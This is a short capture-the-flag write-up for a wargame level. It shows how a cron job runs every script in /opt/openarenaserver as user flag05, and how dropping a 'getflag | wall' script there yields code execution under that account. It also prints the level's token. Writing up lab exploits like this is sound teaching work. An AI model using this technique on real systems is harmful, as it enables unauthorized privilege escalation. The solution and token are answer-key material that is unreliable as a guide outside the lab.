# Level 05 instructions:

When you log in you see a message saying you have mail.

## Check mail:
```
$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
```
Looks like a cron job that runs /usr/sbin/openarenaserver as flag05 every 2 minutes.

## See contents of openarenaserver:
```
$ cat /usr/sbin/openarenaserver
#!/bin/sh

for i in /opt/openarenaserver/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done
```

## Add script to /opt/openarenaserver/ that will run as flag05
```
#!/bin/bash
getflag | wall
``` 

## Wait 2 minutes for cron job to run and you should see this:
```
Broadcast Message from flag05@Snow
        (somewhere) at 0:06 ...

Check flag.Here is your token : viuaaale9huek52boumoomioc
```
